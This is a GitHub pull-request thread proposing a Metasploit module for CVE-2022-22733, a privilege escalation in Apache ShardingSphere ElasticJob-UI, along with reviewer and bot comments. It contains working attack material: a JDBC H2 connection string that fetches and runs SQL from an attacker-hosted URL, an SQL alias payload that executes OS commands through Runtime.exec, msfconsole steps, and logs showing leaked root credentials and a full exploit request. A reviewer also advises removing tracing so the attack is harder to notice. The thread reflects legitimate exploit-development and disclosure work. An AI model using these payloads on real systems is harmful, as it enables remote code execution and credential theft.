Add module for CVE-2022-22733: Apache ShardingSphere ElasticJob-UI privilege escalation

[Zeyad-Azima]

Vulnerable Application

A vulnerability discovered in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733, The vulnerability lead to exposure of sensitive informatiopns and as a results it allows an attacker who has guest account to do privilege escalation.

You can setup the app using docker: sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0

Verification Steps

Example steps in this format (is also in the PR):

1. Install the application: sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0
2. Start msfconsole
3. Do: use exploit/multi/http/apache_shardingsphere_cve_2022_22733
4. Do: set RHOSTS target
5. Do: set JDBC URL_to_your_malicious_sql_script
6. Do: exploit
7. You should get root account credentials.

Options

• JDBC: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql.
• PASSWORD: Password for authentication.
• Proxies: A proxy chain of format type:host:port[,type:host:port][...]
• RHOSTS: The target host(s)
• RPORT: The target port (TCP)
• SSL: Negotiate SSL/TLS for outgoing connections
• USERNAME: The username to authenticate with
• VHOST: HTTP server virtual host

Option Name

• JDBC: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql. Which is used to add the url for your malicious sql script in the request to perform JDBC attack. And it's required.
• PASSWORD: The password for the low-privileged account that you have, the default value is guest that comes with the application, The user can change if he already has an account. And it's required.
• Proxies: A proxy chain of format type:host:port[,type:host:port][...]
• RHOSTS: The target domain/IP. And it's required.
• RPORT: The target port to the application, The default port that the application always use is 8088. And it's required.
• SSL: Negotiate SSL/TLS for outgoing connections. In case the target uses SSL. And by default is not required.
• USERNAME: The username for the low-privileged account that you have, the default value is guest that comes with the application, The user can change if he already has an account. And it's required.
• VHOST: HTTP server virtual host and it's not required.

Scenarios

The JDBC option in case you don't know what is it, You can check it from here.

Basically, If you have a privileged account like the root account, You will be able to create a database base connection.
Now, You may be wondering, If we have the root account credentials, Why we would need to Retrieve it's token ?. So, Basically to perform a connection throug the JDBC we need high-privileges and to automate this process let's see how it works first.

As you can see when we logged-in as guest we are not able to add any data source. But, If we login with the root account. We can see that we have the privileges to add data source and test the connection:

Now, Under the Event Tracer Data Source click on Add button and add the following:

What did we done here?. We named Our data source, then used the h2 driver the H2 itself is a relational database management system, and the org.h2.driver is a JDBC driver used to connect to an H2 database from Java. The URL value:

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'

Basically, This is a JDBC connection string which will connect a H2 in memory database with the name we give which is testdb. Then, TRACE_LEVEL_SYSTEM_OUT=3 parameter enables trace logging to be printed to the console. Finally, INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql' parameter specifies that the poc.sql script located at our URL should be executed when the database is initialized. But, What is inside poc.sql file ?:

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

In short words, This sql script uses the H2 database ability to create an alias to execute command and here we executing calc.exe for the demo of the exploit. Now, Let's start our http server that will host our poc.sql script and after that we click on Test Connect Button:

Now, As we understand it clearly we can run our metasploit module to perform all of these.

[*] Attempting to authenticate...
[+] Authenticated Successfully
[*] Root username: root
[*] Root password: root
[*] Attempting to authenticate with root credentials...
[+] Authenticated with root credentials successfully
[*] Attempting JDBC attack...
[+] JDBC attack successful

For example:

To use it with the default config:

msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set RHOSTS 192.168.0.162
RHOSTS => 192.168.0.162
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set JDBC http://192.168.0.162:8000/poc.sql
JDBC => http://192.168.0.162:8000/poc.sql
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > exploit

Reference

You can read the vulnerability analysis from Here & The exploit blog step by step from Here.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[gwillcox-r7]

Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step Start http server has your malicious sql file for JDBC attack. seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

[Zeyad-Azima]

Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step Start http server has your malicious sql file for JDBC attack. seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

The JDBC option in case you don't know what is it, You can check it from here.

Basically, If you have a privileged account like the root account, You will be able to create a database base connection.
Now, You may be wondering, If we have the root account credentials, Why we would need to Retrieve it's token ?. So, Basically to perform a connection throug the JDBC we need high-privileges and to automate this process let's see how it works first.

As you can see when we logged-in as guest we are not able to add any data source. But, If we login with the root account. We can see that we have the privileges to add data source and test the connection:

Now, Under the Event Tracer Data Source click on Add button and add the following:

What did we done here?. We named Our data source, then used the h2 driver the H2 itself is a relational database management system, and the org.h2.driver is a JDBC driver used to connect to an H2 database from Java. The URL value:

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'

Basically, This is a JDBC connection string which will connect a H2 in memory database with the name we give which is testdb. Then, TRACE_LEVEL_SYSTEM_OUT=3 parameter enables trace logging to be printed to the console. Finally, INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql' parameter specifies that the poc.sql script located at our URL should be executed when the database is initialized. But, What is inside poc.sql file ?:

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

In short words, This sql script uses the H2 database ability to create an alias to execute command and here we executing calc.exe for the demo of the exploit. Now, Let's start our http server that will host our poc.sql script and after that we click on Test Connect Button:

Now, As we understand it clearly we can run our metasploit module to perform all of these.

[*] Attempting to authenticate...
[+] Authenticated Successfully
[*] Root username: root
[*] Root password: root
[*] Attempting to authenticate with root credentials...
[+] Authenticated with root credentials successfully
[*] Attempting JDBC attack...
[+] JDBC attack successful

[Zeyad-Azima]

apache_shardingsphere_cve_2022_22733.md

Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step Start http server has your malicious sql file for JDBC attack. seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

hello @gwillcox-r7 i have modified the doc in this pull request you can check it out, Its the documentation for the module. Thanks.

[gwillcox-r7]

apache_shardingsphere_cve_2022_22733.md

Additional documentation on how this module is meant to work will be needed in order to test this. In particular your step Start http server has your malicious sql file for JDBC attack. seems to suggest using an external tool outside of Metasploit to complete this attack which raises some concerns. Can you provide more clarity on what you meant by this step?

hello @gwillcox-r7 i have modified the doc in this pull request you can check it out, Its the documentation for the module. Thanks.

Hi there, this PR has not been updated to include the doc file as part of this pull request. Please update this PR to add a commit including this file and then I can review it further.

[cdelafuente-r7]

In my understanding, the user will have to start his own HTTP server to deliver the payload. Instead, this can be handled by Metasploit directly with it's internal HTTP server. This main advantage would be to handle any kind of payloads and get a Meterpreter session.

You can have a look to this module as an example on how to setup a HTTP server to deliver the payload:

https://github.com/rapid7/metasploit-framework/blob/3ffd07285216171a9abc3c3588d1da3453e7f464/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb

Please, let us know if you have any questions about this.

[cdelafuente-r7]

Please, use vars_post instead. This would handle everything for you, including encoding:

Suggested change

	'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
	'vars_post' => {
	'username' => datastore['USERNAME'],
	'password' => datastore['PASSWORD']
	}

[gwillcox-r7]

@cdelafuente-r7 Tried your suggestion but this didn't in fact format the request as you expected. Seems like the author's original suggestion may be needed.

[gwillcox-r7]

Ping @Zeyad-Azima, do you need any help making the adjustments that @cdelafuente-r7 recommended?

[gwillcox-r7]

After reading the blog posts a bit more, I realized that as it stands right now, this module will make an arbitrary JDBC connection from the target to a URL we control but it will never actually create a server to serve up that payload. In fact there is no reference to the payload at all.

Reading the article I'm guessing this is what is needed:

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

Where we replace calc.exe with the command we actually want to execute for our target payload to work. However feel free to correct me if I am wrong here.

[gwillcox-r7]

We don't need the extra tracing information so this should remove the TRACE_LEVEL_SYSTEM_OUT=3 part of this. Its going to make the attack easier to notice and offers us as attackers no benefit.

[gwillcox-r7]

Mostly got this working but running into this odd error when trying to retrieve the SQL file with commands to execute:

POST /api/data-source/connectTest HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Access-Token: eyJyb290VXNlcm5hbWUiOiJyb290Iiwicm9vdFBhc3N3b3JkIjoicm9vdCIsImd1ZXN0VXNlcm5hbWUiOiJndWVzdCIsImd1ZXN0UGFzc3dvcmQiOiJndWVzdCIsImJhc2U2NCI6eyJlbmNvZGVUYWJsZSI6WzY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0LDg1LDg2LDg3LDg4LDg5LDkwLDk3LDk4LDk5LDEwMCwxMDEsMTAyLDEwMywxMDQsMTA1LDEwNiwxMDcsMTA4LDEwOSwxMTAsMTExLDExMiwxMTMsMTE0LDExNSwxMTYsMTE3LDExOCwxMTksMTIwLDEyMSwxMjIsNDgsNDksNTAsNTEsNTIsNTMsNTQsNTUsNTYsNTcsNDMsNDddLCJkZWNvZGVUYWJsZSI6Wy0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDYyLC0xLDYyLC0xLDYzLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDAsMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsLTEsLTEsLTEsLTEsNjMsLTEsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYsMzcsMzgsMzksNDAsNDEsNDIsNDMsNDQsNDUsNDYsNDcsNDgsNDksNTAsNTFdLCJkZWNvZGVTaXplIjozLCJlbmNvZGVTaXplIjo0LCJQQUQiOjYxLCJwYWQiOjYxLCJ1bmVuY29kZWRCbG9ja1NpemUiOjMsImVuY29kZWRCbG9ja1NpemUiOjQsImxpbmVMZW5ndGgiOjAsImNodW5rU2VwYXJhdG9yTGVuZ3RoIjoyfSwiZ3NvbiI6eyJjYWxscyI6eyJ0aHJlYWRMb2NhbEhhc2hDb2RlIjo0NzU1NTIxNTh9LCJ0eXBlVG9rZW5DYWNoZSI6eyJqYXZhLmxhbmcucmVmbGVjdC5UeXBlIjp7fSwiY29tLmdvb2dsZS5nc29uLkV4Y2x1c2lvblN0cmF0ZWd5Ijp7fSwiY29tLmdvb2dsZS5nc29uLkluc3RhbmNlQ3JlYXRvclx1MDAzYz9cdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uRmllbGROYW1pbmdTdHJhdGVneSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLkNvbGxlY3Rpb25UeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5NYXBUeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5TcWxEYXRlVHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5EYXRlVHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5Db25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7fSwib3JnLmFwYWNoZS5zaGFyZGluZ3NwaGVyZS5lbGFzdGljam9iLmxpdGUudWkuc2VjdXJpdHkuVXNlckF1dGhlbnRpY2F0aW9uU2VydmljZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlJlZmxlY3RpdmVUeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzAiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzMiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMjYiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzUiOnt9LCJqYXZhLmxhbmcuU3RyaW5nIjp7fSwiYm9vbGVhbiI6e30sIm9yZy5hcGFjaGUuY29tbW9ucy5jb2RlYy5iaW5hcnkuQmFzZTY0Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuSnNvbkFkYXB0ZXJBbm5vdGF0aW9uVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fSwiamF2YS5sYW5nLkNsYXNzXHUwMDNjP1x1MDAzZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLk9iamVjdFR5cGVBZGFwdGVyJDEiOnt9LCJpbnQiOnt9LCJqYXZhLmxhbmcuQnl0ZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5Mb25nU2VyaWFsaXphdGlvblBvbGljeSQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUmVmbGVjdGlvbkFjY2Vzc29yIjp7fSwiY29tLmdvb2dsZS5nc29uLkxvbmdTZXJpYWxpemF0aW9uUG9saWN5Ijp7fSwiZG91YmxlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDMyIjp7fSwiYnl0ZSI6e30sImJ5dGVbXSI6e30sImNvbS5nb29nbGUuZ3Nvbi5yZWZsZWN0LlR5cGVUb2tlblx1MDAzYz9cdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlIjp7fSwiamF2YS51dGlsLk1hcFx1MDAzY2NvbS5nb29nbGUuZ3Nvbi5yZWZsZWN0LlR5cGVUb2tlblx1MDAzYz9cdTAwM2UsIGNvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlclx1MDAzYz9cdTAwM2VcdTAwM2UiOnt9LCJqYXZhLmxhbmcuQm9vbGVhbiI6e30sImNvbS5nb29nbGUuZ3Nvbi5GaWVsZE5hbWluZ1BvbGljeSQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDM0Ijp7fSwiamF2YS51dGlsLk1hcFx1MDAzY2phdmEubGFuZy5yZWZsZWN0LlR5cGUsIGNvbS5nb29nbGUuZ3Nvbi5JbnN0YW5jZUNyZWF0b3JcdTAwM2M/XHUwMDNlXHUwMDNlIjp7fSwiamF2YS51dGlsLkxpc3RcdTAwM2Njb20uZ29vZ2xlLmdzb24uRXhjbHVzaW9uU3RyYXRlZ3lcdTAwM2UiOnt9LCJqYXZhLmxhbmcuSW50ZWdlciI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlRpbWVUeXBlQWRhcHRlciQxIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLkV4Y2x1ZGVyIjp7fSwiY29tLmdvb2dsZS5nc29uLkdzb24iOnt9LCJqYXZhLmxhbmcuRG91YmxlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUHJlSmF2YTlSZWZsZWN0aW9uQWNjZXNzb3IiOnt9LCJqYXZhLnV0aWwuTGlzdFx1MDAzY2NvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlckZhY3RvcnlcdTAwM2UiOnt9LCJqYXZhLmxhbmcuVGhyZWFkTG9jYWxcdTAwM2NqYXZhLnV0aWwuTWFwXHUwMDNjY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSwgY29tLmdvb2dsZS5nc29uLkdzb24kRnV0dXJlVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlXHUwMDNlXHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuQXJyYXlUeXBlQWRhcHRlciQxIjp7fX0sImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiZmFjdG9yaWVzIjpbbnVsbCxudWxsLHsidmVyc2lvbiI6LTEuMCwibW9kaWZpZXJzIjoxMzYsInNlcmlhbGl6ZUlubmVyQ2xhc3NlcyI6dHJ1ZSwicmVxdWlyZUV4cG9zZSI6ZmFsc2UsInNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXSwiZGVzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W119LG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0seyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319LCJjb21wbGV4TWFwS2V5U2VyaWFsaXphdGlvbiI6ZmFsc2V9LHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0sbnVsbCx7ImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImZpZWxkTmFtaW5nUG9saWN5IjoiSURFTlRJVFkiLCJleGNsdWRlciI6eyJ2ZXJzaW9uIjotMS4wLCJtb2RpZmllcnMiOjEzNiwic2VyaWFsaXplSW5uZXJDbGFzc2VzIjp0cnVlLCJyZXF1aXJlRXhwb3NlIjpmYWxzZSwic2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdLCJkZXNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiYWNjZXNzb3IiOnt9fV0sImV4Y2x1ZGVyIjp7InZlcnNpb24iOi0xLjAsIm1vZGlmaWVycyI6MTM2LCJzZXJpYWxpemVJbm5lckNsYXNzZXMiOnRydWUsInJlcXVpcmVFeHBvc2UiOmZhbHNlLCJzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W10sImRlc2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdfSwiZmllbGROYW1pbmdTdHJhdGVneSI6IklERU5USVRZIiwiaW5zdGFuY2VDcmVhdG9ycyI6e30sInNlcmlhbGl6ZU51bGxzIjpmYWxzZSwiY29tcGxleE1hcEtleVNlcmlhbGl6YXRpb24iOmZhbHNlLCJnZW5lcmF0ZU5vbkV4ZWN1dGFibGVKc29uIjpmYWxzZSwiaHRtbFNhZmUiOnRydWUsInByZXR0eVByaW50aW5nIjpmYWxzZSwibGVuaWVudCI6ZmFsc2UsInNlcmlhbGl6ZVNwZWNpYWxGbG9hdGluZ1BvaW50VmFsdWVzIjpmYWxzZSwiZGF0ZVN0eWxlIjoyLCJ0aW1lU3R5bGUiOjIsImxvbmdTZXJpYWxpemF0aW9uUG9saWN5IjoiREVGQVVMVCIsImJ1aWxkZXJGYWN0b3JpZXMiOltdLCJidWlsZGVySGllcmFyY2h5RmFjdG9yaWVzIjpbXX19
Content-Type: application/json
Content-Length: 203

{"name":"6PVJK5wL","driver":"org.h2.Driver","url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.64.128:9090//gB89owqX.sql'","username":"ZZ5O","password":"rFa02gjNbROa"}
[*] 192.168.64.128:9090 - Sending payload to target...
####################
# Response:
####################
HTTP/1.1 200
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type,Access-Token
Set-Cookie: JSESSIONID=E0B7060B6D8319A6252505D0F15AEDF3; Path=/; HttpOnly
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 06 Jun 2023 19:02:18 GMT

{"success":false,"errorCode":500,"errorMsg":"IO Exception: \"java.io.IOException: Cannot run program \"\"javac\"\": error=2, No such file or directory\"; SQL statement:\nCREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}' [90028-196]","model":null}
[-] Exploit aborted due to failure: unexpected-reply: JDBC attack failed. The error message was IO Exception: "java.io.IOException: Cannot run program ""javac"": error=2, No such file or directory"; SQL statement:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}' [90028-196]
[*] Server stopped.

[gwillcox-r7]

Marking this as delayed. I can't seem to solve the issue above and trying to install this product on non-Docker devices keeps throwing up errors with Java at the moment.

[gwillcox-r7]

@Zeyad-Azima Any update on the above? If not I'm going to have to attic this PR until we can get a solution.

[bwatters-r7]

I'm going to go ahead and attic this.

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

• It doesn't look like there has been any activity on this pull request in a while
• We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
• Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!